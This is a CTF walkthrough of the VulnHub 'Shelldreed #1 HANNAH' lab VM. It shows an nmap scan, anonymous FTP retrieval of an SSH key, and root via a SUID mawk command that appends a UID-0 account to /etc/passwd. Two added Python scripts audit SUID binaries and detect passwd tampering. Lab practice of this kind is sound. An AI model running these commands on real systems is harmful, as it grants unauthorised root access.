[VULNHUB] Shelldreed #1 HANNAH

Today we're going to hack the Vulnhub machine called Shelldreed #1 HANNAH. You can download it from the following link: HANNAH

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.108                                                 
                                                                               
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 10:58 CEST
Nmap scan report for 192.168.1.108
Host is up (0.00035s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.59
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:2d:21:0c:2f:af:9d:5a:7b:3e:a4:27:aa:37:89:08 (RSA)
|   256 59:26:da:44:3b:97:d2:30:b1:9b:9b:02:74:8b:87:58 (ECDSA)
|_  256 8e:ad:10:4f:e3:3e:65:28:40:cb:5b:bf:1d:24:7f:17 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

After scanning the ports we see that only the FTP and SSH services are exposed. We connect to the FTP server using anonymous/anonymous to see what we can find...

~ > ftp 192.168.1.108                                                         
Connected to 192.168.1.108.
220 (vsFTPd 3.0.3)
Name (192.168.1.108:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        115          4096 Aug 06 16:56 .
drwxr-xr-x    3 0        115          4096 Aug 06 16:56 ..
drwxr-xr-x    2 0        0            4096 Aug 06 16:54 .hannah
226 Directory send OK.
ftp> 
ftp> cd .hannah
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Aug 06 16:54 .
drwxr-xr-x    3 0        115          4096 Aug 06 16:56 ..
-rwxr-xr-x    1 0        0            1823 Aug 06 16:54 id_rsa
226 Directory send OK.

Inside .hannah there is an id_rsa file. We download it.

ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (1823 bytes).
226 Transfer complete.
1823 bytes received in 0.00 secs (1.6495 MB/s)

It looks like an SSH key, so we try to log in as hannah using that key.

~ > chmod 600 id_rsa
~ > ssh hannah@192.168.1.108 -i id_rsa -p 61000
The authenticity of host '[192.168.1.108]:61000 ([192.168.1.108]:61000)' can't be established.
ECDSA key fingerprint is SHA256:ceHZU8u3GwiQwVwrN4Ci830AmTvAmIUOlLjtVYcP2KM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.1.108]:61000' (ECDSA) to the list of known hosts.
Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  5 09:20:42 2020 from 192.168.1.140
hannah@ShellDredd:~$

We're in :)

user.txt



hannah@ShellDredd:~$ ls
user.txt
hannah@ShellDredd:~$ cat user.txt
Gr3mMhbCpuwxCZorqDL3ILPn

Privilege Escalation


We explore the system looking for a SUID binary that could help us with privilege escalation.

hannah@ShellDredd:~$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/cpulimit
/usr/bin/mount
/usr/bin/passwd
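
Reading a SUID listing like the one above by eye is error-prone; what a defender (or a CTF player) really wants is a diff against the set-uid binaries the distribution ships. The script below is an added example, not part of the original write-up. BASELINE_SUID is a constructed allowlist of the set-uid binaries a stock Debian 10 install carries (an assumption for this example: rebuild it from a trusted install of your own distribution before relying on it). Anything on the host that is missing from the baseline is reported for review; on this box that surfaces mawk, which the write-up goes on to use, and also cpulimit.

```python
"""Audit set-uid binaries against a known-good baseline.

Added example, not part of the original write-up. BASELINE_SUID is a
constructed allowlist (assumption: stock Debian 10); SAMPLE_FIND_OUTPUT is
the `find / -perm -4000` listing reproduced from the write-up.
"""
import os
import stat
import sys
from typing import FrozenSet, Iterable, List

BASELINE_SUID: FrozenSet[str] = frozenset({
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/bin/gpasswd",
    "/usr/bin/newgrp",
    "/usr/bin/umount",
    "/usr/bin/chfn",
    "/usr/bin/su",
    "/usr/bin/chsh",
    "/usr/bin/mount",
    "/usr/bin/passwd",
})

# Constructed sample: the output of `find / -perm -4000 2>/dev/null` shown above.
SAMPLE_FIND_OUTPUT = """\
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/cpulimit
/usr/bin/mount
/usr/bin/passwd
"""


def parse_find_output(text: str) -> List[str]:
    """Extract absolute paths from `find` output, one per line; ignore noise."""
    return [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]


def unexpected_suid(paths: Iterable[str],
                    baseline: FrozenSet[str] = BASELINE_SUID) -> List[str]:
    """Set-uid binaries that are not on the baseline, sorted for stable output."""
    return sorted(set(paths) - baseline)


def live_suid_paths(root: str = "/") -> List[str]:
    """Collect regular files carrying the set-uid bit, like `find -perm -4000`."""
    pruned = ("/proc", "/sys", "/dev", "/run")
    found: List[str] = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(pruned):
            dirnames[:] = []        # do not descend into pseudo-filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue            # unreadable entry, skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


if __name__ == "__main__":
    # `--live` walks this host; otherwise the constructed sample is audited.
    paths = live_suid_paths() if "--live" in sys.argv else parse_find_output(SAMPLE_FIND_OUTPUT)
    for path in unexpected_suid(paths):
        print("not in baseline, review:", path)
```

Run it with `--live` on a host you administer, or pipe in a saved `find` listing; anything it prints is a binary whose set-uid bit somebody added after installation and should be explained or removed.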

We see that "mawk" is set-uid, which we can use... We are going to create a user in the /etc/passwd file with root permissions, with the help of mawk. The password our user will use is "123", so we prepare its hash to put it in the file.

~ > openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1

Once we have the password hash we want to use, we use mawk to append to /etc/passwd a line with the user that will have root privileges and that we will log in with!

hannah@ShellDredd:~$ mawk -v LFILE=/etc/passwd 'BEGIN { print "ruut:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash" >> LFILE }'

After running the command, we can log in as "ruut".

hannah@ShellDredd:~$ su ruut
Password:123 
root@ShellDredd:/home/hannah#

And now we are root!
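
The persistence trick just shown leaves a very visible trace: a second UID-0 account whose hash sits in /etc/passwd rather than /etc/shadow. The checker below is an added example, not part of the original write-up; it parses passwd(5) entries and reports extra UID-0 accounts, hashes stored directly in /etc/passwd, empty password fields, UIDs shared between accounts and malformed lines. SAMPLE_PASSWD is a constructed file whose last line is the entry appended above with mawk.

```python
"""Check an /etc/passwd file for the kind of tampering performed above.

Added example, not part of the original write-up. SAMPLE_PASSWD is a
constructed file: three ordinary entries plus the injected 'ruut' line.
"""
import sys
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (account or location, description)

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hannah:x:1000:1000:hannah,,,:/home/hannah:/bin/bash
ruut:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
"""

# Values passwd(5) uses when the real hash lives in /etc/shadow or the account
# is locked; anything else in field 2 is a hash (or an empty field).
SHADOW_PLACEHOLDERS = ("x", "*", "!", "!!")


def audit_passwd(text: str) -> List[Finding]:
    """Return one (who, what) finding per suspicious property of the file."""
    findings: List[Finding] = []
    uid_owners: Dict[int, List[str]] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry, expected 7 fields"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((name, f"non-numeric UID {uid!r}"))
            continue
        uid_owners.setdefault(int(uid), []).append(name)
        if int(uid) == 0 and name != "root":
            findings.append((name, "UID 0 account that is not 'root'"))
        if pw == "":
            findings.append((name, "empty password field, login without a password"))
        elif pw not in SHADOW_PLACEHOLDERS:
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
    # Shared UIDs are reported once per UID, after every line has been seen.
    for uid, names in sorted(uid_owners.items()):
        if len(names) > 1:
            findings.append((",".join(names), f"UID {uid} shared by {len(names)} accounts"))
    return findings


if __name__ == "__main__":
    # Audit the file named on the command line, or the constructed sample.
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for who, what in audit_passwd(source):
        print(f"{who}: {what}")
```

On the sample it flags ruut three times (UID 0 under a non-root name, a hash in the wrong file, and UID 0 shared with root); a clean passwd file produces no output. Running it against a saved copy of /etc/passwd from an incident image works the same way.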

root.txt



root@ShellDredd:/home/hannah# cd /root
root@ShellDredd:~# ls
root.txt
root@ShellDredd:~# cat root.txt 
yeZCB44MPH2KQwbssgTQ2Nof

End


And with that we are root on the machine.